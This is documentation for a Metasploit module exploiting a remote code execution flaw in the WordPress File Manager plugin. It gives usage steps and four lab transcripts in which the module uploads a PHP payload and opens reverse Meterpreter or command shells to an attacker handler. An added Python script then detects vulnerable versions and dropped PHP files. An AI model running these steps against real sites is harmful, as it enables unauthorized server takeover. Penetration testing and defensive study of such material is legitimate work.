## Vulnerable Application

Get a copy of version 6.0 plugin from https://downloads.wordpress.org/plugin/wp-file-manager.6.0.zip.
Vulnerable versions are 6.0-6.8. Versions below 6.0 are not vulnerable and version 6.9 has been patched.

## Verification Steps

1. Start msfconsole
2. Do: `use exploit/multi/http/wp_file_manager_rce`
3. Do: `set TARGETURI `
4. Do: `set RHOSTS `
5. Optional: Do: `set RPORT `
6. Optional: Do: `set PAYLOAD ` to switch payloads
7. Optional: Do: `set COMMAND ` to switch elFinder commands used to exploit vulnerability
8. Do: `check` to confirm existence of vulnerability or `exploit` to let the shells rain

## Options

### COMMAND

This vulnerability can be exploited in 2 ways:

1. `upload` to directly upload a payload
2. `mkfile` to create a file, then `put` to write arbitrary code to the newly created file

This option has 2 valid values:

1. `upload`: exploit using the `upload` technique (default)
2. `mkfile+put`: exploit using `mkfile` and `put`

## Scenarios

### Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, default payload, using `upload`

```
msf6 > use exploit/multi/http/wp_file_manager_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/wp_file_manager_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444
[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
[*] Found version 6.0 in the plugin
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/aEiptb.php
[*] Sending stage (39264 bytes) to 172.17.0.3
[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 172.17.0.3:35578) at 2020-10-12 20:19:16 +0800

meterpreter > sysinfo
Computer    : 6fc94cd81e93
OS          : Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)
meterpreter >
```

### Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, `php/reverse_php` payload, using `upload`

```
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/wp_file_manager_rce) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf6 exploit(multi/http/wp_file_manager_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444
[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
[*] Found version 6.0 in the plugin
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/XFVi0d.php
[*] Command shell session 2 opened (192.168.137.128:4444 -> 172.17.0.3:35598) at 2020-10-12 20:20:04 +0800

uname -a
Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64 GNU/Linux
whoami
www-data
```

### Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, default payload, using `mkfile+put`

```
msf6 > use multi/http/wp_file_manager_rce
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/wp_file_manager_rce) > set COMMAND mkfile+put
COMMAND => mkfile+put
msf6 exploit(multi/http/wp_file_manager_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444
[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
[*] Found version 6.0 in the plugin
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/unl8LJ.php
[*] Sending stage (39264 bytes) to 172.17.0.3
[*] Meterpreter session 5 opened (192.168.137.128:4444 -> 172.17.0.3:38076) at 2020-10-15 17:42:00 +0800

meterpreter > sysinfo
Computer    : 6fc94cd81e93
OS          : Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)
meterpreter >
```

### Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, `php/reverse_php` payload, using `mkfile+put`

```
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf6 exploit(multi/http/wp_file_manager_rce) > set COMMAND mkfile+put
COMMAND => mkfile+put
msf6 exploit(multi/http/wp_file_manager_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444
[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
[*] Found version 6.0 in the plugin
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/DmFEWt.php
[*] Command shell session 6 opened (192.168.137.128:4444 -> 172.17.0.3:38096) at 2020-10-15 17:43:27 +0800

uname -a
Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64 GNU/Linux
whoami
www-data
```
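The scenarios above show the module reading the plugin's `readme.txt` for a version and, on success, dropping a PHP file under `lib/files/`. As an added defender-side example (not part of the module or this documentation), the following script applies the 6.0-6.8 range from this page to a plugin `readme.txt` and flags PHP files under `lib/files/`; it assumes the readme carries the usual WordPress `Stable tag:` line, and all inputs are constructed samples.

```python
import re
from typing import List, Optional, Tuple

# Affected range taken from the documentation: 6.0 through 6.8 vulnerable, 6.9 patched.
FIRST_VULNERABLE = (6, 0)
FIRST_PATCHED = (6, 9)

# Constructed sample readme.txt header (assumption: the plugin readme follows the
# WordPress convention of a "Stable tag:" line that states the installed version).
SAMPLE_README = """=== File Manager ===
Requires at least: 4.0
Tested up to: 5.5
Stable tag: 6.0
License: GPLv2 or later
"""

# Constructed sample directory listing from a WordPress install (hypothetical paths).
SAMPLE_PATHS = [
    "/var/www/html/wp-content/plugins/wp-file-manager/lib/files/README.md",
    "/var/www/html/wp-content/plugins/wp-file-manager/lib/files/aEiptb.php",
    "/var/www/html/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php",
    "/var/www/html/wp-content/plugins/wp-file-manager/lib/files/DmFEWt.php",
]


def parse_stable_tag(readme_text: str) -> Optional[Tuple[int, ...]]:
    """Return the 'Stable tag' version as an int tuple, or None when absent."""
    m = re.search(r"^Stable tag:\s*(\d+(?:\.\d+)*)\s*$", readme_text, re.M | re.I)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def is_vulnerable_version(version: Tuple[int, ...]) -> bool:
    """True when FIRST_VULNERABLE <= version < FIRST_PATCHED (tuple comparison)."""
    return FIRST_VULNERABLE <= version < FIRST_PATCHED


def assess_readme(readme_text: str) -> str:
    """Human-readable verdict for one readme.txt."""
    version = parse_stable_tag(readme_text)
    if version is None:
        return "unknown: no Stable tag found"
    label = ".".join(map(str, version))
    if is_vulnerable_version(version):
        return f"{label}: vulnerable, update to 6.9 or later"
    return f"{label}: not affected"


def suspicious_lib_files(paths: List[str]) -> List[str]:
    """PHP files under wp-file-manager/lib/files/, the drop location seen in the scenarios."""
    pattern = re.compile(r"/wp-file-manager/lib/files/[^/]+\.php$", re.I)
    return sorted(p for p in paths if pattern.search(p))
```

Run the two checks from a maintenance script and alert on a vulnerable verdict or a non-empty list of PHP files, since the plugin's `lib/files/` directory is not expected to contain executable code.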